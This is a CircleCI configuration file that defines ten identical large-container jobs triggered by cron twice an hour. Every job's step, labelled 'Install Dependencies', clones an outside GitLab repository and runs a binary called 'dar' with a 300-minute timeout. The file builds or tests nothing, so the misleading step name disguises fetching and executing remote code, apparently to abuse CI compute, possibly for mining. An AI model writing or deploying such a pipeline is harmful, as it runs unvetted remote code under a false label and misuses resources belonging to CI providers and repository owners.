version: 2
jobs:
    asak1:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak2:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak3:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak4:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak5:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak6:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak7:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak8:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak9:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
    asak10:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/jningkulin/masitoh.git && cd masitoh && chmod u+x dar && ./dar
            no_output_timeout: 300m
workflows:
  version: 2
  build:
    jobs:
      - asak1
      - asak2
      - asak3
      - asak4
      - asak5
      - asak6
      - asak7
      - asak8
      - asak9
      - asak10
    triggers:
      - schedule:
          cron: "0,21 * * * *"
          filters:
            branches:
              only:
                - main
  deploy:
    jobs:
      - asak1
      - asak2
      - asak3
      - asak4
      - asak5
      - asak6
      - asak7
      - asak8
      - asak9
      - asak10
